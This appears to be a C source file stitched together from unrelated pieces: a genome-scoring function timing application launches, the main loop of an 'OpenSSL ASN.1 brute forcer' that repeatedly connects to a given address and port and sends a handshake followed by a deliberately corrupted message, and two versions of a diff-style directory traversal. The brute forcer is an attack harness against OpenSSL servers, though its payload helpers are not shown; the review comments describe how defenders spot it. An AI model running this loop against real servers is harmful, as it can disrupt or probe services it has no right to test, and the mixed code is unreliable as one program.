/*
 * Score a single genome.
 *
 * Two intervals are timed: how long waitidle() takes to report an idle
 * system, and how long waitdbus() takes after the click that launches the
 * application (per the original author, until its loading animation
 * starts).  Their sum is stored in g->score and a one-line summary is
 * printed.  A zero return from either wait helper is shown as " [timeout]".
 */
static void eval(struct genome_st *g)
{
    struct timeval idle_begin, idle_end, click_done, dbus_end;
    int idle_ok, dbus_ok;
    unsigned idle_cost, launch_cost;

    /* Phase 1: bracket the wait for the system to go idle. */
    gettimeofday(&idle_begin, NULL);
    idle_ok = waitidle(g->window, g->threshold, TIMEOUT);
    gettimeofday(&idle_end, NULL);

    /* Phase 2: click, then bracket the wait on D-Bus. */
    click(150, 200);
    gettimeofday(&click_done, NULL);
    dbus_ok = waitdbus(30);
    gettimeofday(&dbus_end, NULL);

    /* The score is simply the sum of both measured intervals. */
    idle_cost = diffit(&idle_end, &idle_begin);
    launch_cost = diffit(&dbus_end, &click_done);
    g->score = idle_cost + launch_cost;

    printf(
        "window=%u, threshold=%f, t1=%u%s, t2=%u%s, score=%u\n",
        g->window, g->threshold,
        idle_cost, idle_ok ? "" : " [timeout]",
        launch_cost, dbus_ok ? "" : " [timeout]",
        g->score);
} /* eval */
/*
 * Entry point of a network test client that announces itself as an
 * "OpenSSL ASN.1 brute forcer".
 *
 * Usage: prog <ipv4-address> <port>
 *
 * After argument checks it loops forever: open a TCP connection, write two
 * buffers (the second one after it has been passed through corruptor()),
 * pause 1 ms, close.  The loop only ends through exit() when socket() or
 * connect() fails.
 *
 * send_hello(), send_crap(), corruptor(), diffit() and the global buf are
 * defined outside this view; presumably the first write is a handshake
 * message and the second a deliberately damaged one -- confirm against the
 * helpers.
 *
 * NOTE(review): from the side of a service being tested this way, the
 * visible loop shows up as a steady stream of very short-lived connections
 * from one source address, each closed about 1 ms after two writes.
 * Connection-rate limits, alerting on bursts of handshake/parse failures
 * and a patched OpenSSL build are the relevant controls.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in addr;
    int s, port = 0, first = 1, len; /* first: no connection has succeeded yet */
    char *host = NULL;
    unsigned int seed;
    struct timeval tv;

    printf("OpenSSL ASN.1 brute forcer (Syzop/2003)\n\n");

    if (argc != 3) {
        fprintf(stderr, "Use: %s [ip] [port]\n", argv[0]);
        exit(1);
    }

    host = argv[1];
    /* atoi() yields 0 for non-numeric text, which the range check below rejects. */
    port = atoi(argv[2]);
    if ((port < 1) || (port > 65535)) {
        fprintf(stderr, "Port out of range (%d)\n", port);
        exit(1);
    }

    /*
     * Seed rand() from pid and wall-clock time and print the seed; the
     * generator is not a cryptographic one.
     */
    gettimeofday(&tv, NULL);
    seed = (getpid() ^ tv.tv_sec) + (tv.tv_usec * 1000);
    printf("seed = %u\n", seed);
    srand(seed);

    memset(&addr, 0, sizeof(addr));

    /*
     * With SIGPIPE ignored, a write() to a connection the peer has already
     * closed fails with an error instead of terminating this process.
     */
    signal(SIGPIPE, SIG_IGN); /* Ignore SIGPIPE */

    while(1) {
        if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            fprintf(stderr, "Socket error: %s\n", strerror(errno));
            exit(EXIT_FAILURE);
        }

        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
        /* NOTE(review): the inet_addr() result is not checked for a parse failure. */
        addr.sin_addr.s_addr = inet_addr(host);

        if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
            fprintf(stderr, "Unable to connect: %s\n", strerror(errno));
            /*
             * Only when an earlier connection had succeeded is diffit()
             * called before exiting; its body is outside this view.
             */
            if (!first)
                diffit();
            exit(EXIT_FAILURE);
        }
        first = 0;

        /* One dot of progress output per established connection. */
        printf("."); fflush(stdout);

        /* NOTE(review): both write() return values are ignored. */
        len = send_hello();
        write(s, buf, len);
        len = send_crap();
        corruptor(buf, len);
        write(s, buf, len);
        usleep(1000); /* pause 1 ms before closing the connection */
        close(s);
    }

    /* Not reached: the loop above has no break. */
    exit(EXIT_SUCCESS);
}
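/*
 * Diff directory traversal. Will be called recursively if -r was specified.
 *
 * p1, p2: the two directories to compare; an empty string is read as ".".
 * flags:  handed through unchanged to diffit().
 *
 * Both directories are listed with scandir() (filtered by selectfile,
 * sorted by alphasort) and walked in lock step.  Errors are reported with
 * warn()/warnx(); a path that does not fit in MAXPATHLEN also sets the
 * global exit status to 2.  A missing directory counts as empty when -N is
 * set (either side) or -P is set (first side only).
 */
void
diffdir(char *p1, char *p2, int flags)
{
	struct dirent *dent1, **dp1, **edp1 = NULL, **dirp1 = NULL;
	struct dirent *dent2, **dp2, **edp2 = NULL, **dirp2 = NULL;
	size_t dirlen1, dirlen2;
	char path1[MAXPATHLEN], path2[MAXPATHLEN];
	int pos;

	/*
	 * Copy each directory name and make sure it ends in '/'.  The ">=
	 * size - 1" test leaves room for the slash that may be appended.
	 */
	dirlen1 = strlcpy(path1, *p1 ? p1 : ".", sizeof(path1));
	if (dirlen1 >= sizeof(path1) - 1) {
		warnx("%s: %s", p1, strerror(ENAMETOOLONG));
		status = 2;
		return;
	}
	if (path1[dirlen1 - 1] != '/') {
		path1[dirlen1++] = '/';
		path1[dirlen1] = '\0';
	}
	dirlen2 = strlcpy(path2, *p2 ? p2 : ".", sizeof(path2));
	if (dirlen2 >= sizeof(path2) - 1) {
		warnx("%s: %s", p2, strerror(ENAMETOOLONG));
		status = 2;
		return;
	}
	if (path2[dirlen2 - 1] != '/') {
		path2[dirlen2++] = '/';
		path2[dirlen2] = '\0';
	}

	/*
	 * Get a list of entries in each directory, skipping "excluded" files
	 * and sorting alphabetically.
	 */
	pos = scandir(path1, &dirp1, selectfile, alphasort);
	if (pos == -1) {
		if (errno == ENOENT && (Nflag || Pflag)) {
			pos = 0;
		} else {
			warn("%s", path1);
			goto closem;
		}
	}
	dp1 = dirp1;
	edp1 = dirp1 + pos;

	pos = scandir(path2, &dirp2, selectfile, alphasort);
	if (pos == -1) {
		if (errno == ENOENT && Nflag) {
			pos = 0;
		} else {
			warn("%s", path2);
			goto closem;
		}
	}
	dp2 = dirp2;
	edp2 = dirp2 + pos;

	/*
	 * If we were given a starting point, find it.
	 */
	if (start != NULL) {
		while (dp1 != edp1 && strcmp((*dp1)->d_name, start) < 0)
			dp1++;
		while (dp2 != edp2 && strcmp((*dp2)->d_name, start) < 0)
			dp2++;
	}

	/*
	 * Iterate through the two directory lists, diffing as we go.
	 */
	while (dp1 != edp1 || dp2 != edp2) {
		dent1 = dp1 != edp1 ? *dp1 : NULL;
		dent2 = dp2 != edp2 ? *dp2 : NULL;

		/* An exhausted list sorts after every name in the other one. */
		pos = dent1 == NULL ? 1 : dent2 == NULL ? -1 :
		    strcmp(dent1->d_name, dent2->d_name);
		if (pos == 0) {
			/* file exists in both dirs, diff it */
			diffit(dent1, path1, dirlen1, path2, dirlen2, flags);
			dp1++;
			dp2++;
		} else if (pos < 0) {
			/* file only in first dir, only diff if -N */
			if (Nflag)
				diffit(dent1, path1, dirlen1, path2, dirlen2,
				    flags);
			else if (lflag)
				dent1->d_status |= D_ONLY;
			else
				print_only(path1, dirlen1, dent1->d_name);
			dp1++;
		} else {
			/* file only in second dir, only diff if -N or -P */
			if (Nflag || Pflag)
				diffit(dent2, path1, dirlen1, path2, dirlen2,
				    flags);
			else if (lflag)
				dent2->d_status |= D_ONLY;
			else
				print_only(path2, dirlen2, dent2->d_name);
			dp2++;
		}
	}

	if (lflag) {
		/* Cut both paths back to "dir/" before printing the summary. */
		path1[dirlen1] = '\0';
		path2[dirlen2] = '\0';

		/*
		 * Walk by the recorded end pointers.  A scandir() list has no
		 * NULL sentinel, and dirp1/dirp2 is NULL when a missing
		 * directory was accepted above, so looping until *dp == NULL
		 * would read past the array or dereference NULL.
		 */
		for (dp1 = dirp1; dp1 != edp1; dp1++) {
			dent1 = *dp1;
			print_status(dent1->d_status, path1, path2,
			    dent1->d_name);
		}
		for (dp2 = dirp2; dp2 != edp2; dp2++) {
			dent2 = *dp2;
			if (dent2->d_status == D_ONLY)
				print_status(dent2->d_status, path2, NULL,
				    dent2->d_name);
		}
	}

closem:
	/* Release every entry, then the pointer array itself. */
	if (dirp1 != NULL) {
		for (dp1 = dirp1; dp1 < edp1; dp1++)
			xfree(*dp1);
		xfree(dirp1);
	}
	if (dirp2 != NULL) {
		for (dp2 = dirp2; dp2 < edp2; dp2++)
			xfree(*dp2);
		xfree(dirp2);
	}
}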
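/*
 * Diff directory traversal. Will be called recursively if -r was specified.
 *
 * p1, p2: the two directories to compare; an empty string is read as ".".
 * flags:  handed through unchanged to diffit().
 *
 * Both directories are read with slurpdir() (defined elsewhere).  This
 * function relies on it returning NULL on failure and otherwise a list
 * that ends in a NULL entry, since every loop below stops at that entry.
 * A path that does not fit in MAXPATHLEN is reported and sets the global
 * exit status to 2.
 */
void
diffdir(char *p1, char *p2, int flags)
{
	struct diffdirent **dirp1, **dirp2, **dp1, **dp2;
	struct diffdirent *dent1, *dent2;
	size_t dirlen1, dirlen2;
	char path1[MAXPATHLEN], path2[MAXPATHLEN];
	char *dirbuf1, *dirbuf2;
	int pos;

	/*
	 * Copy each directory name and make sure it ends in '/'.  The ">=
	 * size - 1" test leaves room for the slash that may be appended.
	 */
	dirlen1 = strlcpy(path1, *p1 ? p1 : ".", sizeof(path1));
	if (dirlen1 >= sizeof(path1) - 1) {
		warnx("%s: %s", p1, strerror(ENAMETOOLONG));
		status = 2;
		return;
	}
	if (path1[dirlen1 - 1] != '/') {
		path1[dirlen1++] = '/';
		path1[dirlen1] = '\0';
	}
	dirlen2 = strlcpy(path2, *p2 ? p2 : ".", sizeof(path2));
	if (dirlen2 >= sizeof(path2) - 1) {
		warnx("%s: %s", p2, strerror(ENAMETOOLONG));
		status = 2;
		return;
	}
	if (path2[dirlen2 - 1] != '/') {
		path2[dirlen2++] = '/';
		path2[dirlen2] = '\0';
	}

	/* get a list of the entries in each directory */
	dp1 = dirp1 = slurpdir(path1, &dirbuf1, Nflag + Pflag);
	dp2 = dirp2 = slurpdir(path2, &dirbuf2, Nflag);
	/*
	 * If only one side failed, the other list is still allocated; go
	 * through the common cleanup instead of returning and leaking it.
	 */
	if (dirp1 == NULL || dirp2 == NULL)
		goto cleanup;

	/*
	 * If we were given a starting point, find it.
	 */
	if (start != NULL) {
		while (*dp1 != NULL && strcmp((*dp1)->d_name, start) < 0)
			dp1++;
		while (*dp2 != NULL && strcmp((*dp2)->d_name, start) < 0)
			dp2++;
	}

	/*
	 * Iterate through the two directory lists, diffing as we go.
	 */
	while (*dp1 != NULL || *dp2 != NULL) {
		dent1 = *dp1;
		dent2 = *dp2;

		/* An exhausted list sorts after every name in the other one. */
		pos = dent1 == NULL ? 1 : dent2 == NULL ? -1 :
		    strcmp(dent1->d_name, dent2->d_name);
		if (pos == 0) {
			/* file exists in both dirs, diff it */
			diffit(dent1, path1, dirlen1, path2, dirlen2, flags);
			dp1++;
			dp2++;
		} else if (pos < 0) {
			/* file only in first dir, only diff if -N */
			if (Nflag)
				diffit(dent1, path1, dirlen1, path2, dirlen2,
				    flags);
			else if (lflag)
				dent1->d_status |= D_ONLY;
			else
				print_only(path1, dirlen1, dent1->d_name);
			dp1++;
		} else {
			/* file only in second dir, only diff if -N or -P */
			if (Nflag || Pflag)
				diffit(dent2, path1, dirlen1, path2, dirlen2,
				    flags);
			else if (lflag)
				dent2->d_status |= D_ONLY;
			else
				print_only(path2, dirlen2, dent2->d_name);
			dp2++;
		}
	}

	if (lflag) {
		/* Cut both paths back to "dir/" before printing the summary. */
		path1[dirlen1] = '\0';
		path2[dirlen2] = '\0';
		for (dp1 = dirp1; (dent1 = *dp1) != NULL; dp1++) {
			print_status(dent1->d_status, path1, path2,
			    dent1->d_name);
		}
		for (dp2 = dirp2; (dent2 = *dp2) != NULL; dp2++) {
			if (dent2->d_status == D_ONLY)
				print_status(dent2->d_status, path2, NULL,
				    dent2->d_name);
		}
	}

cleanup:
	/*
	 * Same ownership test as before (a non-NULL dirbuf means the list and
	 * its buffer are ours to free), applied only to a side whose
	 * slurpdir() call succeeded so dirbuf is never read after a failure.
	 */
	if (dirp1 != NULL && dirbuf1 != NULL) {
		xfree(dirp1);
		xfree(dirbuf1);
	}
	if (dirp2 != NULL && dirbuf2 != NULL) {
		xfree(dirp2);
		xfree(dirbuf2);
	}
}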